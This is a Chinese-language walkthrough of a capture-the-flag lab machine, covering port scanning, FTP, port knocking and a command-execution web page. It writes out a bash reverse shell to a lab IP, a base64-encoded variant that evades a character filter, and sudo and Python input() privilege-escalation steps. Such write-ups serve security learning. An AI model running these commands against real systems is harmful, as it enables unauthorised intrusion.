主機探測：netdiscover-i eth0 -r 192.168.1.0/24

端口探測及服務識別：nmap-sS -sV -T5 -A -p- 192.168.1.103

當前靶機開放了21,1337和7331端口。這里發現ftp可以匿名登錄，先進去看看有什么文件。

登陸后發現有3個txt文件，都下載到本地看看

從三個文件的信息來看，第1個信息可能是賬戶密碼，第2個提示1337端口有個小游戲，完成了會獲得獎勵，第3個信息是封郵件。來看看1337的游戲是什么，使用telnet訪問看看。

似乎是加減運算，需要計算1000次才能夠完成，看來需要編寫一個腳本去完成這個小游戲。這里使用python寫了1個小程序去跑

運行腳本完成后，得到3個數字。看著像是SSH的Knock敲門機制，需要分別訪問這三個端口，22端口才會開放。

Kali上使用knock命令需先安裝Knockd,我這里已經安裝過了，可使用apt-getinstall knockd進行安裝。之后進行敲門

此時22端口已經開放，之前有發現一對似乎是賬號密碼的信息，拿來嘗試一下

看來不是的，由于沒有賬戶密碼，這里就先放放。從7331的web服務入手

先掃一波目錄，這里用的dirsearch,kali上需要自行從github上下載。這里使用的1個字典SecLists也是從github上下載的

./dirsearch.py -u 192.168.1.103:7331 -e * -w

/root/zidian/SecLists/Discovery/Web-Content/raft-large-directories.txt

解釋一下參數，-u后面接url,-e后面接后綴，代表所有后綴，如php,jsp,html,txt等，-w指定字典。

這里掃出兩個目錄/wish和/genie，訪問一下看看。

看到這個就想到了命令執行，先輸個id試試，果然存在命令執行

試一下反彈shell，bash-i >& /dev/tcp/192.168.1.104/1234 0>&1,kali上使用nc監聽1234端口

出現錯誤，看來是存在過濾。先看看過濾了哪些字符

/，&被過濾了。

那么可以試一下base64編碼繞過，然后使用echo解碼執行，使用下面這條命令

echoYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA0LzEyMzQgMD4mMQ==| base64-d |bash

成功反彈shell。

拿到shell第1件事就是獲取一個標準shell，可通過以下命令獲取

python -c import pty; pty.spawn("/bin/bash")

先看下本目錄下有啥東西

有1個app.py文件，查看一下內容，發現了1個txt文件路徑

查看一下，得到了一組用戶名密碼

前面因為已經開放了22端口，為了更方便的使用shell,越是不在此會話中切換用戶，而是使用SSH登錄上去操作。

拿到nitish的權限，先進入其home目錄下看看

拿到user.txt這個flag

下面需要進行提權，因為剛得到的shell權限較低,得想辦法獲取高權限賬戶,最終獲取root權限。

最后就是如何獲取root權限，有以下幾個思路

Sudo -l 查詢具有sudo權限命令，然后提權

SUID提權,find / -perm -u=s -type f 2>/dev/null

通過在/etc/passwd添加一個root權限的賬戶進行提權

find / -writable -type f 2>/dev/null 查找可利用的可寫文件

內核提權

這里使用sudo-l 查詢有哪些sudo權限命令

這里需通過genie提權,sudo-u sam /usr/bin/genie

這里需要加上參數，我這里使用-p參數進行提權，可是沒有成功

然后使用mangenie看下該命令的使用手冊

依照使用手冊，看來是使用-p,-e或者-cmd參數來執行提權命令

于是又試了一下-e參數，不過還是沒有成功

最后再試了下-cmd參數，成功獲取sam用戶權限，發現-cmd后面參數隨便填都可以

再次使用sudo-l查詢有哪些sudo權限

通過sudo執行，有4個選項，每個都去嘗試了一下，沒啥作用

這樣先去看下sam目錄下有啥東西，找一下是否有其他信息提示

在sam目錄下發現1個.pyc文件，先把它下載到本地，

.pyc文件無法直接查看，需要進行反編譯，這里可以使用python的uncompyle進行反編譯，需要使用pipinstall uncompyle進行安裝

然后使用uncompyle16xxx.pyc >xxx.py進行反編譯

之后打開看看

發現這就是我們執行sudo/root/lago時運行的程序代碼，在我們執行猜數流程時，讓我輸入1-100的數字，當s==num時執行system(‘/bin/sh’),根據此代碼我們輸入num即可提權

至此，我們獲得了root權限,讀取最后一個flag

前面sudo/root/lago提權時的原理是根據python的input函數進行提權，網上搜了一下,這個input函數的漏洞在于，當input函數接收的值為某個已定義的變量時，將等同與此變量。

固這里我們只需輸入sum，該程序即會運行system(‘/bin/sh’)